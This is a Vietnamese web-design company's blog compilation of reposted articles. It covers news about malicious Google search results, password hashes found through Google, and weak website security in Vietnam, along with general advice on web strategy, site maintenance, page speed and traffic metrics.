Nguy cơ tiềm ẩn trên Google Search

By Công Ty Truyền Thông Số iGO

Các chuyên gia bảo mật hôm 28-11 chính thức khởi động một chiến dịch nhằm hướng dẫn người dung phân biệt những website độc hại được liệt kê trong trang kết quả tìm kiếm của Google Search.

Cho dù người dùng thực hiện tìm kiếm trên Google Search bằng những cụm từ bình thường - ví dụ "how to cisco router vpn dial in" hoặc “cell phones” - nhưng trên trang kết quả được hiển thị sau đó không hề thiếu các website độc hại.

“Số lượng website độc hại vô cùng lớn,” ông Alex Eckelberry - Giám đốc điều hành Sunbelt Software - cho biết. “Hiện chúng tôi đã phát hiện được 27 tên miền độc hại. Mỗi tên miền nói trên trỏ đến 1.499 trang web độc hại khác nhau. Tính ra số lượng website độc hại sẽ không dưới 40.000 trang”.

Những kẻ sở hữu các website độc hại này thường sử dụng các biện pháp như “comment spam” hoặc “blog spam” để tăng mức độ truy cập giúp đẩy cao xếp hạng của website trên Google Search. Nhờ đó những website đó được hiển thị nhiều hơn và ở vị trí cao hơn trên trang kết quả tìm kiếm của Google Search.

Hiện chưa có bằng chứng nào cho thấy tội phạm mạng bỏ tiền ra mua từ khoá tìm kiếm của Google. Tuy nhiên, chắc chắn một điều chúng đã thực hiện nhiều thủ đoạn để “bắt cóc” chiếm quyền điều khiển không ít website hợp pháp để giúp chúng phát tán mã độc.

“Chúng tìm mọi thủ đoạn để xuất hiện trên Google và chuyển hướng bất kỳ người dùng nào không để ý nhắp chuột vào website của chúng đến các website độc hại khác,” ông Eckelberry cho biết.

Hầu hết người dùng thường không mấy khi để ý và nghi ngờ những kết quả tìm kiếm trên Google bởi liên kết đến những website đó được hiển thị với những từ khoá rất phù hợp với mong muốn tìm kiếm và mang những tên miền cấp một “rất kêu”.

Một khi đã truy cập vào những website độc hại đó người dùng thường phải đối mặt với một thông báo giả mạo thiếu sót tính năng gì đó để có thể hiện thị tốt website. Nếu người dùng nhắp chuột vào thông báo đó thì đồng nghĩa họ đã chấp nhận tải về rất nhiều mã độc.

Ví dụ, Sunbelt Software đã phát hiện được có những website sẵn sàng cài đặt tới 25 loại mã độc khác nhau lên PC người dùng - như phần mềm chuyên gửi thư rác, rootkit, ăn cắp mật khẩu, trojan … - nếu họ vô tình nhắp chuột truy cập vào. Bất kỳ PC nào không được cài đặt đầy đủ các bản vá lỗi đều sẽ phải lĩnh hậu quả khôn lường.

Các chuyên gia bảo mật khuyến cáo người dùng nên xem xét cẩn thận mỗi khi quyết định nhắp chuột vào một liên kết kết quả tìm kiếm nào đó. Có những website độc hại được Google nhận diện và cảnh báo đầy đủ. Người dùng nên tránh những website này đồng thời thường xuyên nâng cấp cài đặt các bản sửa lỗi mới nhất cho các phần mềm trên PC.

(Theo PC World)

 

Google biến thành... công cụ bẻ mật khẩu

By Công Ty Truyền Thông Số iGO

Một chuyên gia của Khoa Công nghệ máy tính trường Đại học Cambridge, Anh, đã sử dụng thành công Google để bẻ khóa những mật khẩu thiết lập bằng định dạng MD5 (Thuật toán Số-Chữ 5).

Trong một dịp tình cờ, chuyên gia bảo mật Steven Murdoch phát hiện thấy blog cá nhân Light Blue Touchpaper của mình đã bị một kẻ ẩn danh xâm nhập. Kẻ này thậm chí còn thiết lập một tài khoản admin bên trong phần mềm blog Wordpress - vốn được cài đặt trên máy chủ.

Khi tiến hành kiểm tra toàn diện máy tính của mình để xác định mức độ thiệt hại, Murdoch đã bị ấn tượng bởi cách phá mật khẩu Wordpress của hacker.

Do tất cả mật khẩu Wordpress đều thuộc định dạng MD5 và được lưu trữ bên trong cơ sở dữ liệu người dùng nên Murdoch đã viết ra một đoạn mã script, so sánh toàn bộ từ khóa trong từ điển tiếng Anh với MD5 để tìm ra từ tương ứng.

Tuy nhiên, nỗ lực thử nghiệm đầu tiên này đã thất bại, và Murdoch quyết định chuyển sang sử dụng từ điển tiếng Nga. Nguyên do là vì ông đã tìm thấy nhiều comment viết bằng tiếng Nga bên trong đoạn mã được cấy lên máy chủ.

Thế nhưng ngay cả nỗ lực thứ hai này cũng không thành công. Đó là khi Murdoch quyết định nhờ cậy... Google.

Murdoch đã nhập mật khẩu MD5 vào trong Google và nhận được nhiều đường link kết quả với một điểm chung: Cái tên Anthony. Điều đó khiến ông đủ chắc chắn để tin rằng Anthony chính là mật khẩu.

"Google đang kiêm nhiệm cả chức năng của một công cụ bẻ khóa, bởi nó cho phép ta tìm kiếm những mật khẩu từng được mã hóa trước đây. Rõ ràng là Google đang làm công việc mà họ vẫn làm tốt nhất: lưu trữ một cơ sở dữ liệu khổng lồ rồi tìm kiếm trong đó", Murdoch cho biết.

(Theo VNUnet)

 

Tấn công website công ty, 5 phút là xong!

By Công Ty Truyền Thông Số iGO

Website của doanh nghiệp Việt Nam hiện nay, thậm chí của cơ quan nhà nước, rất dễ xâm nhập để thay đổi dữ liệu. Trao đổi với chúng tôi, anh Võ Đỗ Thắng - Giám đốc Trung tâm Athena, một công ty chuyên về đào tạo bảo mật và an ninh mạng, cho biết các website của doanh nghiệp Việt Nam hiện nay, thậm chí của cơ quan nhà nước rất dễ xâm nhập để thay đổi dữ liệu.

Rất dễ, kể cả website của công ty chứng khoán!

Tại công ty của anh Thắng, thật bất ngờ, chúng tôi gặp lại Bùi Minh Trí, học sinh lớp 12 ở Vĩnh Long từng "nổi danh" trong vụ tấn công website của Bộ Giáo dục - Đào tạo cách đây gần 1 năm. Khá rụt rè, Trí nói: "Em hiện nay theo học khóa đào tạo nâng cao về bảo mật và an ninh mạng, sau những việc làm thiếu suy nghĩ trước đây, em đã quyết tâm làm một hacker mũ trắng". Theo đề nghị của chúng tôi, Trí bắt đầu thực hiện các thao tác để phát hiện các trang web có lỗ hổng. 5 phút sau, Bùi Minh Trí đã thông báo có thể xâm nhập vào hệ thống máy chủ của một website và chỉ dẫn cho chúng tôi xem. Sau đó, Trí còn xâm nhập được vào cả hệ thống cơ sở dữ liệu của một công ty chuyên về công nghệ thông tin hàng đầu Việt Nam hiện nay và có thể thay đổi cả nội dung các bản tin trên website...

Theo Trung tâm an ninh mạng Bkis Đại học Bách khoa Hà Nội, trong tháng 10.2007, Bkis đã gửi cảnh báo tới 32 cơ quan, doanh nghiệp về các lỗ hổng ở mức độ nguy hiểm cao, hacker có thể lợi dụng để đánh cắp cơ sở dữ liệu, chiếm quyền kiểm soát website và máy chủ. Một chuyên gia về bảo mật thông tin cảnh báo: "Tôi đã thử xâm nhập vào một số website của các công ty chứng khoán hàng đầu Việt Nam và thật bất ngờ là công tác bảo mật lại rất mỏng manh. Với những lỗ hổng bảo mật, việc hacker xâm nhập vào, nắm bắt và thay đổi được thông tin của các công ty niêm yết, các nhà đầu tư hay chỉnh sửa nội dung cổng thông tin của công ty chứng khoán để tung ra các tin đồn thất thiệt gây nguy hại đến thị trường là những việc hoàn toàn có thể làm được".

Bảo mật yếu vì thiếu tiền?

Tại hội thảo về bảo mật trong công nghệ thông tin do hãng bảo mật quốc tế McAfee tổ chức ngày 13.11 tại TP.HCM, ông Ashley Wearne - Phó chủ tịch McAfee khu vực Đông Nam Á, Úc, New Zealand và Ấn Độ cho biết: Doanh nghiệp không thể kinh doanh mà không dùng web và liên lạc e-mail. Thế nhưng hầu hết các công ty đều dành ngân sách cho bảo mật công nghệ thông tin chỉ tăng trung bình 3%, quá nhỏ so với tốc độ gia tăng các cuộc tấn công của hacker, virus, spam... Rõ ràng hệ thống công nghệ thông tin cần được bảo vệ nhiều hơn.

Theo thống kê, tại Việt Nam, khoảng 90% doanh nghiệp có cài chương trình diệt virus, trong đó 10% không bao giờ cập nhật phiên bản chống virus mới. Theo các chuyên gia trong ngành bảo mật thông tin, lỗi bảo mật thường gặp ở các doanh nghiệp vừa và nhỏ là không có chương trình chống virus, không sao lưu dữ liệu định kỳ, không cập nhật các phiên bản chống virus và các bản vá lỗi; thiếu người quản trị và giữ an ninh hệ thống mạng... Chính "nhờ" những lỗ hổng như thế mà các hacker tha hồ xâm nhập và cài các đoạn mã nguy hiểm vào làm tê liệt hệ thống máy tính. Tuy nhiên, việc đầu tư một hệ thống bảo mật đồ sộ như của các nhà cung cấp dịch vụ internet hoặc các tập đoàn lớn là điều không thể đối với các doanh nghiệp nhỏ.

Anh Võ Đỗ Thắng nhận định: "Trong thời gian qua, chúng ta chỉ lo phát triển về cơ sở hạ tầng mạng nên chưa quan tâm nhiều đến bảo mật hệ thống thông tin. Ngoài ra, đội ngũ chuyên viên bảo mật vừa thiếu về số lượng và yếu về chuyên môn, các doanh nghiệp chưa có người chuyên trách về bảo mật và lập kế hoạch cho chiến lược bảo mật doanh nghiệp. Bên cạnh đó, ý thức bảo mật thông tin của các doanh nghiệp còn chưa cao, chưa lường hết được hậu quả và thiệt hại khi rò rỉ thông tin hoặc thông tin bí mật của công ty bị nhân viên lấy cắp bán cho đối thủ cạnh tranh. Nếu như nhân viên của một ngân hàng lấy thông tin tài khoản bán cho một ngân hàng cạnh tranh với giá 5 USD/tài khoản thôi thì mức độ thiệt hại của ngân hàng đó có thể lên đến cả triệu USD. Việc đầu tư bảo mật chiếm một số tiền rất nhỏ so với mức độ thiệt hại, cho nên không thể nói vì doanh nghiệp thiếu tiền mà phải nói đến ý thức của chủ doanh nghiệp chưa cao".

(Theo ThanhNien)

 

Xây dựng chiến lược Web

By Công Ty Truyền Thông Số iGO

1. Chiến lược?

Chiến lược hiểu một cách thông thường là Chiến Đấu với các đối thủ, với bản thân thông qua một Sách Lược cụ thể nhằm đạt được một mục tiêu nào đó mà bản thân bạn hoặc công ty bạn đã đề ra.

Chiến lược là phương hướng và quy mô của một tổ chức dài hạn, chiến lược sẽ mang lại lợi thế cho tổ chức thông qua việc thực hiện các chiến lược đã đề ra.

Bất cứ một công ty, doanh nghiệp đều phải có chiến lược, phương hướng, quy mô hoạt động nhằm mục đích cuối cùng là mang lại lợi nhuận, thanh thế cho tổ chức.

2. Chiến lược web là thế nào?

Bạn đã từng có rất nhiều chiến lược khác nhau, hướng vào thị trường khác nhau ở từng thời điểm khác nhau ví dụ trước đây bạn thực hiện chiến lược bằng cách đăng tin lên báo chí, truyền hình, phát brochure,… để hỗ trợ cho việc kinh doanh, thì thấy ngay lợi ích của nó đối với doanh nghiệp bạn. Nhưng hiện nay liệu việc thực hiện các chiến lược đó có thực sự tối ưu chưa trong khi đối thủ cạnh tranh của bạn đã có một bước tiến mới nhờ áp dụng khoa học công nghệ thông tin vào hoạt động kinh doanh.


Bạn có biết tính đến thời điểm tháng 12 năm 2005 trên mạng Internet có hơn 40 triệu website với hơn 8 tỷ trang web. Nếu một người mỗi ngày tìm kiếm ra và xem 10 website mới thì phải mất 4 triệu ngày (12.000 năm) mới đọc qua hết số website có trên thế giới, đó là chưa kể ước tính mỗi tháng có 1.000.000 website mới ra đời, và dĩ nhiên, số website “chết” trong tháng vẫn không ít.

Bạn có khi nào đặt ra câu hỏi cho mình là tại sao lại có nhiều website như thế không? Thiết nghĩ đó là mục đích rõ ràng không cần suy nghĩ ai cũng biết là nó công cụ phục vụ kinh doanh rất thiết thực hiện nay vì chi phí thấp, quảng bá không giới hạn thời gian, địa điểm mang nó mang tính quốc tế đem lại lợi nhuận cao.

Tuy hiện nay không chắc rằng tất cả các website đều đem lại lợi ích thực sự là vì họ không có một chiến lược đúng đắn, khoa học cho việc kinh doanh trên mạng, và kinh nghiệm còn non yếu với việc áp dụng công nghệ này.

Nhưng bên cạnh đó có rất nhiều website hoạt động đem lại một thanh thế, một thương hiệu, một khoản lợi nhuận khổng lồ cho doanh nghiệp và có rất nhiều doanh nghiệp đã chuyển hướng chỉ thực hiện việc kinh doanh thông qua mang internet, web, email.

Do đó việc có một chiến lược xây dựng một webstie để có thể đem lại lợi nhuận là điều không thể thiếu, phải có sự phân tích, hoạch định, định hướng rõ ràng và phải được sự cố vấn đúng đắn, kịp thời của các những doanh nhân đã thành công trong lĩnh vực kinh doanh trên mạng hiện nay.

3. Lợi ích, tầm quan trọng của việc xây dựng một chiến lượt web?

Việc có một chiến lược web khoa học, đúng đắn sẽ mang lại giúp cho doanh nghiệp bạn vượt qua đối thủ cạnh tranh, đồng hành cùng với các doanh nghiệp tầm cở, có cơ hội cạnh tranh công bằng trên thị trường, theo kịp thời đại hội nhập vào thị trường quốc tế.

Đồng thời bạn còn có được những lợi ích thiết thực:

  • Giảm chi phí đáng kể.
  • Giúp doanh nghiệp có một website như mong muốn, đáp ứng xu hướng công nghệ và kinh doanh hiện đại.
  • Nâng quy mô doanh nghiệp lên một tầm cao mới.
  • Nâng thanh thế, phạm vi hoạt động của doanh nghiệp ra toàn thế giới.
  • Tạo ra một hệ thống quản lý hàng hoá, tin tức mang tính khoa học, dễ quản lý, dễ sử dụng, thuận tiện cho việc các đối tác, nhà cung cấp, khách hàng xem hay chọn sản phẩm để mua.
4. Tác động, ảnh hưởng của một chiến lược web lên doanh nghiệp

Đi đôi với sự phát triển và tăng trưởng của nền kinh tế. Nó đòi hỏi doanh nghiệp của bạn phải nỗ lực hết mình để làm viẹc với năng lực và năng xuất cao.

Nhằm thay thế sức lao động thuần tuý của con người và thay đổi phương thức làm việc thủ công kém hiệu quả đã có rất nhiều doanh nghiệp đã bắt nhịp cùng thời đại, xây dựng cho mình một hệ thống quản lý văn phòng hiện đại hơn, thiết thực hơn, tiết kiệm thời gian trong việc quản lý công việc, quản lý lịch công tác, quản lý quan hệ khách hàng, quản lý nhân sự, quản lý tin tức nội bộ, quản lý sản phẩm, quản lý hình ảnh, quản lý văn bản, quản lý tin nhắn chỉ thông qua một công cụ hiện đại hiện nay là website. Và kế hoạch xây dựng website để nó đưa vào hoạt động đúng mục đích, yêu cầu của doanh nghiệp.

Vì vậy chiến lược web là công việc mà bất cứ doanh nghiệp nào cũng phải suy nghĩ, đau đầu, vì nó chình là bộ mặt của của doanh nghiệp đông thời là công cụ quản lý hiệu quả nhất của doanh nghiệp trong thời điểm hiện nay và sau này.

(Sưu tầm)

 

Quản trị - Bảo trì hệ thống

By Công Ty Truyền Thông Số iGO

1. Tại sao lại phải quản trị bảo trì?

Bảo trì là công việc không thể thiếu khi có một website đang hoạt động, vì các sự cố xảy ra sẽ nhanh chóng được khắc phục để đưa web trở về trạng thái hoạt động bình thường.

Nếu không có bảo trì thì website của bạn sẽ chạy ì ạch hoặc những lỗi nhỏ thông thường sẽ không được sửa chữa lại sẽ làm cho người sử dụng chán nản, không muốn sử dụng.

Nếu không bảo trì thì làm sao có thể đảm bảo được website hoạt động 24/24 mà không bị gián đoạn.

Nếu website không được bảo trì làm sao biết được để nâng cấp, sửa chữa nó cho phù hợp với thời điểm sử dụng, chiến lược kinh doanh.
2. Công việc quản trị - bảo trì như thế nào?

Công việc quản trị - bảo trì hệ thống là một phần vô cùng quan trọng giúp cho bộ máy hoạt động của website trơn tru, dễ sử dụng hơn, luôn luôn tự nâng cấp website lên một tầm cao hơn trước.

Do vậy công việc của bảo trì là:
  • Backup định kỳ
  • Tối ưu tốc độ hoạt động của website
  • Phục hồi hệ thống khi gặp sự cố
  • Duy trì hệ thống
  • Xử lý lỗi trong quá trình sử dụng
  • Thông báo kết quả kiểm tra hàng tháng về các vấn để không mong muốn khi website đang hoạt động từ đó đưa ra các giải pháp, hướng giải quyết để website hoạt động ngày càng tốt hơn, hiểu quả hơn.
3. Lợi ích gì từ việc quản trị - bảo trì?
  • Đảm bảo được website hoạt động 24/24
  • Đảm bảo được tốc độ xử lý của website
  • Đảm bảo được website ngày càng hoàn thiện hơn
  • Đảm bảo được vấn đề mất mát, bảo mật dữ liệu
  • Đảm bảo được vấn lỗi lập trình trong quá trình hoạt động của website
  • Đảm bảo được sự truy cập ổn định
  • Thống kê được những vấn đề không muốn khi website đang hoạt động.
4. Sai lầm trong việc quản trị bảo trì….

Website nếu không được bảo trì thì thật là tai hại:
  • Sự cố bất ngờ xảy ra sẽ không có người khắc phục
  • Việc mất mát dữ liệu, hoặc dữ liệu không được bảo mật là điều không tránh khỏi
  • Không đảm bảo được website hoạt động 24/24
  • Không đảm bảo được sự truy cập ổn định
  • Website không có sự phát triển, không có sự đổi mới
  • Website không hấp dẫn người xem, không thể thực hiện được mục đích kinh doanh của doanh nghiệp.
(Sưu tầm)

 

Quản trị - Cập nhật dữ liệu

By Công Ty Truyền Thông Số iGO

1. Quản trị là gì?

Quản trị là phân tích, hoạch định, kiểm tra, kiếm soát các thông tin, dữ liệu trên website, đồng thời xây dựng các kế hoạch, chiến lược kinh doanh trên mạng cho khách hàng nhằm đưa trang web vào hoạt động kinh doanh mang lại lợi nhuận thiết thực cho công ty, doanh nghiệp.

Quản trị là một công việc vô cùng quan trọng đối với một website động đòi hỏi người quản trị phải am hiểu về lĩnh vực kinh doanh trên website, đồng thời phải là người biết về kỹ thuật website, đồ hoạ, tìm kiếm thông tin trên hệ thống các hệ thống seach trên mạng để làm cho website luôn luôn mới mẽ, thu hút và phải biết quảng bá thông tin về website trên mạng.

Để thành công trong việc quản trị đòi hỏi người quản trị phải có kiến thức sâu rộng về Web và TMĐT

2. Quản trị nội dung

Đối với một website thì nội dung hay và chất lượng là hết sức cần thiết vì chính nó tố chất quyết định sự thành công của một trang web, nội dung càng nhiều, càng hấp dẫn, càng được cập nhật thường xuyên, càng chuyên sâu thì số người xem càng đông và việc kinh doanh nhờ đó sẽ phát triển vượt bật.

Tại sao hiện nay có rất nhiều trang web nhưng không thể đưa vào kinh doanh hoặc được vào kinh doanh nhưng không hiệu quả vì khi người xem vào một lần là không bao giờ quay lại vì nội dung nghèo nàn không được cập nhật, trau chuốt… Và người sử dụng, khách hàng chỉ xem qua một lần rồi không quay trở lại nữa vì không có gì hấp dẫn họ, hay nhớ, trên mạng có hàng triệu website như bạn, vì vậy hãy tạo cho mình một nét riêng mà không nới nào có được.

Do đó, quản trị nội dung là công việc quản lý, sắp xếp, chọn lọc nội dung, thông tin một cách khoa học, có kế hoạch vụ thể trong từng giai đoạn phát triển của công ty, của trang web nhằm tạo ấn tượng giúp cho người xem nhanh chóng hiểu được mục đích hoạt động của trang web, thông tin phong phú, hấp dẫn và dễ sử dụng.

Người quản trị nội dung phải nhanh nhẹn trong việc nắm bắt các thông tin liên quan đến ngành nghề như thông tin về thị trường, thông tin sản phẩm, thông tin giá cả, thông tin mới nhất về lĩnh vực kinh doanh của website, các đối thủ cạnh tranh trên mạng, xu hướng công nghệ, thị hiếu online của người xem….

3. Quản trị dữ liệu

Quản trị dữ liệu là công việc quản lý, bảo đảm rằng dữ liệu không bị mất mát, sai sót, dữ liệu càng nhiều thì việc quản lý nó vô cùng phức tạp, buộc người quản lý phải có nhiều kiến thức về server, hệ thống web, bảo mật, database….

Do đó người quản trị phải nắm bắt được cách thức tổ chức, lưu trữ, xử lý lỗi phát sinh, đảm bảo đảm an toàn dữ liệu, bảo mật dữ liệu.

4. Tầm quan trọng của quản trị

Nếu bạn đã có một website thì chắc chắn rằng trang web đó phải có người quản trị, đó cũng chính là người chịu trách nhiệm chính trong lĩnh vực kinh doanh trên mạng, trang web có thu hút, hấp dẫn, nội dung cập nhật nhanh chóng, đẹp mắt hay không là hoàn toàn phụ thuộc vào người quản trị.

Và website có nhiều khách viếng thăm hay không đa phần cũng phụ thuộc vào người quản trị vì họ không chỉ là người quản lý, theo dõi, cập nhật tin tức thường xuyên mà còn là người đưa thông tin, quảng bá website của bạn lên mạng như đặt logo, banner của bạn lên các trang web khác, đưa trang web lên hệ thống tìm kiếm toàn cầu,….. có một chiến lược quảng bá một cách cụ thể khoa học.

Nếu website mà không được quản trị thì nó chỉ là một công cụ, không bao giờ phục vụ được cho việc kinh doanh và mang lại lợi nhuận thiết thực.

Muốn việc quản trị đạt được hiểu quả như mong muốn là điều không dễ, và thật sai lầm khi giao việc đó cho một người hoặc một vài người. Việc này đòi hỏi sự tập trung của cả một tổ chức một công ty chuyên về quản trị.

5. Những sai lầm về việc quản trị

Bạn đừng bao giờ nghĩ rằng việc quản trị là công việc thừa thải, không quan trọng, bởi vì website của bạn có thực sự gây được ấn tượng với khách hàng hay không, có thân thiện không, thông tin có được cập nhật mới không, website chạy ổn định hay lúc có lúc không đó mới là điều quan trọng. Và bạn biết rằng website nó chỉ là khung sườn, là công cụ nếu không biết sử dụng, khai thác triệt để nó để đưa vào hoạt động kinh doanh thì chắc hẳn website đó để chơi, mà để thực hiện được vấn đề đó thì đòi hỏi phải có sự quản trị mà trong đó người quản trị đóng một vai trò hết sức quan trọng phải là người am hiểu về lĩnh vực hoạt động của website, am hiểu về kỹ thuật tin học, website,….

(Sưu tầm)

 

7 thủ thuật tăng tốc website

By Công Ty Truyền Thông Số iGO

Nghiên cứu thói quen sử dụng máy tính cho thấy người dùng sẽ chuyển sang trang khác nếu website không có “động tĩnh” gì sau 4 giây. Vì thế, tốc độ là yếu tố quan trọng và cũng là ưu thế cạnh tranh để cung cấp thông tin.

7 thủ thuật dưới đây sẽ tăng đáng kể website của bạn.

1. Chuyển host lưu trữ file hoặc ảnh cỡ lớn sang nơi khác:

Dịch vụ ImageShack được nhiều người làm nơi lưu trữ ảnh cho website.
Dịch vụ ImageShack được nhiều người làm nơi lưu trữ ảnh cho website.

Nhiều người cùng online một lúc có thể làm nghẽn đường truyền của bạn với hàng đống yêu cầu xem cùng một tấm hình trên website. Gánh nặng dữ liệu có thể chuyển sang những website chuyên để lưu trữ và chia sẻ ảnh như ImagaShack, Photobucket hay Flickr. Bằng cách này, máy chủ web của bạn chỉ cần đảm bảo phần text và file ảnh cỡ nhỏ, giảm đáng kể băng thông đồng nghĩa với việc phục vụ được nhiều người một lúc hơn.

Nếu muốn chia sẻ những file nhỏ, khoảng 2 – 5MB, với khách viếng thăm, bạn có thể sử dụng dịch vụ Google Pages như một máy chủ web phụ.

2. Tối ưu hóa mã CSS:

Hiện nay, nhiều website bắt đầu sử dụng CSS (Cascade Style Sheet) để định dạng. Mặc dù bảng CSS nhìn bắt mắt và hiệu quả hơn định dạng bảng HTML, nhưng nó đòi hỏi bạn phải tối ưu hóa code của chúng mới mong đạt được tốc độ tối ưu. Đoạn mã CSS “sạch” sẽ giúp trình duyệt giải mã trang web nhanh hơn.

Ví dụ: Thay vì viết:

margin-top: 20px;
margin-right: 10px;
margin-bottom: 20px;
margin-left: 10px;

Bạn nên viết:

margin: 20px 10px 20px 10px;

Theo các chuyên gia tối ưu hóa của Yahoo thì các mã CSS nên được đặt ở phần đầu của web. Điều này đặc biệt ý nghĩa nếu trang của bạn lớn và có nhiều đối tượng. Nếu bạn đặt CSS ở cuối hoặc giữa trang web, trình duyệt sẽ dùng định dạng mặc định để hiện thị, sau đó mới tái định dạng bằng CSS. Điều đó đòi hỏi thêm thời gian tính toán và tất nhiên người dùng sẽ khó chịu khi nhìn một website vỡ tung khi chưa định hình.Thậm chí, một số trình duyệt cũng cấm đặt CSS tại cuối website.

Nếu chưa thạo về code, công cụ trực tuyến nhỏ Clean CSS sẽ giúp bạn công đoạn tối ưu này, loại bỏ những khai báo thừa và khoảng trống vô nghĩa. Bạn có thể tham khảo tại đây.

3. Tối ưu hóa hình ảnh:

Sử dụng tính năng Save for Web để loại bớt những thông tin không cần thiết và tối ưu kích thước ảnh.
Sử dụng tính năng Save for Web để loại bớt những thông tin không cần thiết và tối ưu kích thước ảnh.
Có 4 loại định dạng hình ảnh sử dụng phổ biến trên web: PNG, JPG, /JPEG và GIF. Hầu hết các phần mềm xử lý ảnh như Adobe Photoshop đều có tính năng “Save for Web” để tối ưu tỉ lệ giữa chất lượng hình và kích thước file.

4. Khai báo kích thước hình ảnh:

Nhiều lập trình viên nghiệp dư “quên” khai báo tag chiều cao và rộng của ảnh khi viết mã HTML. Hai thông số này báo với trình duyệt kích thước của ảnh trước khi dữ liệu được tải về. Nếu không được khai báo trước, trình duyệt phải tự tính toán kích thước bằng cách download toàn bộ hình ảnh về, sau đó mới đến lượt các dữ liệu khác.

Khi khai báo hình ảnh có đầy đủ các tag, trình duyệt sẽ dành 1 khoảng trống vừa đúng kích thước ảnh và tiếp tục tải dữ liệu . Như vậy, người xem có thể đọc ngay phần văn bản trong khi hình ảnh vẫn tiếp tục được hiện ra từng phần.

5. Giảm thiểu sử dụng Javascript:

Các hiệu ứng hoạt hình của Java script rất bắt mắt và nhiều người có xu hướng đưa chúng vào website của mình. Tuy nhiên, sử dụng quá nhiều Javascript có thể làm trình duyệt bị treo cứng khiến người dùng bực mình. Phải cân nhắc thật kỹ lưỡng trước khi sử dụng chúng.

Vị trí đặt các đoạn mã script cũng khá quan trọng đối với tốc độ hiển thị. Lời khuyên của dân lập trình chuyên nghiệp: chỉ để những script thực sự quan trọng có ảnh hưởng toàn trang lên đầu, còn những hiệu ứng khác (hoạt hình, thống kê,…) thì cho xuống cuối trang.

Việc đưa Javascript và CSS ra liên kết bên ngoài tốt hơn là chèn thẳng vào trang web. Những file này sẽ được lưu tại bộ nhớ đệm (cache) của trình duyệt và người dùng sẽ không phải download lại chúng mỗi khi cần đến. Nó giảm đáng kể thời gian và băng thông của máy chủ cũng như người dùng.

6. Tối ưu hóa liên kết:

Chú ý mỗi đường link được đặt trên website hay blog của bạn được viết một cách ngắn gọn và chính xác. Ví dụ mỗi entry trên 360 Yahoo đều có 1 phần “Permanent Link” để lấy liên kết chính xác và gọn gàng hơn nhiều so với những gì hiển thị trên ô địa chỉ (address bar) của trình duyệt. Việc sử dụng chính xác đường link sẽ giảm bớt những yêu cầu không đáng có đối với máy chủ trong một số trường hợp.

7. Giảm bớt các yêu cầu HTTP tới máy chủ:

Khi mở website, mỗi đối tượng trên trang (hình ảnh, script, hình vẽ, đường kẻ, …) đều tạo ra 1 yêu cầu tới máy chủ để tải về. Tất nhiên, càng nhiều đối tượng thì việc tải về càng lâu hơn. Vì thế, hãy giảm thiểu số đối tượng trên cùng 1 trang và cố gắng gộp file CSS với các script lại với nhau.

(Theo VietnamNet)

 

Các phương pháp và công cụ đánh giá website

By Công Ty Truyền Thông Số iGO

Khách hàng là người quyết định - điều này cũng đúng trong thế giới web. Số lượng khách truy cập website, số trang khách xem, thời gian khách dừng chân... quyết định thứ hạng và giá trị của website.

Thế giới web ngày càng nhộn nhịp, thu hút không chỉ người dùng cá nhân mà cả doanh nghiệp. Ngày càng có nhiều công ty lập website, kinh doanh và quảng cáo trên web. Tuy theo đuổi những mục tiêu khác nhau nhưng hầu hết các công ty đều cần đo lường hiệu quả công sức và tiền của mà họ đã đầu tư trên web.

Câu nói “khách hàng luôn đúng” lại vẫn đúng! Website có nội dung hấp dẫn, sẽ có nhiều khách truy cập; nội dung website được cập nhật, khách sẽ đến thường xuyên. Những “số đo” về khách truy cập website có thể trả lời cho các câu hỏi như: “mức độ thu hút của website?”, “hiệu quả của chiến dịch tiếp thị?”, “sự trung thành của khách hàng?”, “phân khúc khách hàng quan trọng?”... những số liệu này giúp các chủ website hiểu được khách hàng của mình tốt hơn và có thể đưa ra những chiến lược thích hợp đem lại sự hài lòng cho khách hàng và lợi nhuận cho website.

Các chỉ số

Khi nói đến mức độ thu hút của website, người ta thường trưng ra số “hit” – số lượt truy cập. Không có gì lạ vì đây là chỉ số có thể gây ấn tượng nhờ trị số lớn.

Hit thường được đếm khi có một thành phần dữ liệu (file) được truy xuất từ máy chủ web (web server). Một trang web có thể gồm nhiều thành phần như CSS, JavaScript, hình,... Khi trình duyệt của người dùng mở một trang web, nó sẽ yêu cầu tất cả thành phần này từ web server, mỗi yêu cầu có thể được đếm như 1 hit. Nếu thiết kế “khéo”, một trang web có thể tạo nên hàng chục hit mỗi lần được truy cập.

Số hit thường do các website tự đếm và không có dịch vụ độc lập kiểm chứng, nó hay được nói quá lên và cũng rất dễ dùng kỹ thuật lập trình tạo ra số hit tăng phi mã. Do tình trạng lạm phát, hit đã bị mất giá và giờ đây không còn được xem là thước đo chính cho website.

Tương tự hit, số trang xem - “pageview” - cũng được đếm khi có yêu cầu truy xuất file từ web server nhưng chỉ đếm cho trang chính (file .htm, .asp, .php...), không tính các thành phần trong trang. Nhiều website hiện nay đã áp dụng cách đếm “trung thực” này tuy vẫn dùng tên “hit”, khi này số hit chính là số pageview. Số pageview có ý nghĩa không chỉ vì nó cho biết số trang “thật” được xem mà còn cho biết số quảng cáo được hiển thị cùng với trang (quảng cáo có thể được bán theo phương thức CPM – Cost Per iMpression, tính cho mỗi 1000 trang xem).
Hiện được xem là 1 trong 2 “thước do” chính của website (Hình 1), tuy nhiên chỉ số pageview có nguy cơ bị thất sủng do những kỹ thuật mới như Ajax, RSS, mashup... và sự phát triển của video trên web. Những kỹ thuật mới như Ajax đem đến cho người dùng thông tin nhanh hơn, nhiều hơn, tiện lợi hơn và ít phải nạp trang web hơn, do vậy giảm số pageview. Pageview càng bị thất thu với video - với những website như YouTube người ta có thể xem cả thước phim (có thể xen kẽ hàng chục cảnh quảng cáo) chỉ với 1 trang xem.

Hình 2. Chỉ số thời gian cho biết “sức hút” của trang đối với những đối tượng khách khác nhau.

Chỉ số thứ 2 hiện được trọng dụng là số khách truy cập (“visitor” hay “unique visitor”). Khách truy cập website được xác định dựa trên thông tin nhận dạng thường là địa chỉ IP hay dữ liệu cookie “không trùng” trong khoảng thời gian quy định (chẳng hạn 12 giờ hay 24 giờ). Trong thời gian này, mỗi khách chỉ được đếm 1 lần dù truy cập website nhiều lần (và tạo nên nhiều hit). Chỉ số này rất có ý nghĩa đối với các báo điện tử và công ty quảng cáo. Rõ ràng, nhiều người xem quan trọng hơn là chỉ một nhóm người xem đi xem lại nhiều lần.

